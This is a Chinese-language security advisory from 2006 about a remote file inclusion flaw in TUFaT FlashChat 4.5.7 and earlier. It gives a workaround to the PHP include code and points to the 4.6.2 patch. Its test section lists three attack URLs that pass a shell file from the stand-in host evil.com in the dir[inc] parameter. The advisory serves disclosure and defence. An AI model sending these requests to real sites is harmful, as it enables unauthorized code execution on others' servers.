发布日期：2006-09-04
更新日期：2006-09-05

受影响系统：

TUFaT Flashchat <= 4.5.7

不受影响系统：

TUFaT Flashchat 4.6.2

描述：

---

BUGTRAQ  ID: 19826

FlashChat是一款个性化聊天室，支持大部分的PHP格式的CMS系统，也可以作为独立的聊天室。

FlashChat在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞以Web进程权限执行任意命令。

FlashChat的/inc/cmses/aedating4CMS.php、/inc/cmses/aedatingCMS.php和/inc/cmses/aedatingCMS2.php脚本没有正确验证dir[inc]变量用户输入，允许攻击者通过包含本地或外部资源的任意文件导致执行任意脚本代码。

<*来源：NeXtMaN （mc.nadz@gmail.com）
  
  链接：http://milw0rm.com/exploits/2293
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

建议：

---

临时解决方法：

将以下文件

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );

修改为：

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "[Your AED path]/db.inc.php" );
require_once( "[Your AED path]/admin.inc.php" );

厂商补丁：

TUFaT
-----
目前厂商已经在4.6.2及以上版本的软件中修复了这个安全问题，请到厂商的主页下载：

http://www.tufat.com/index.php

浏览次数：3056
严重程度：0（网友投票）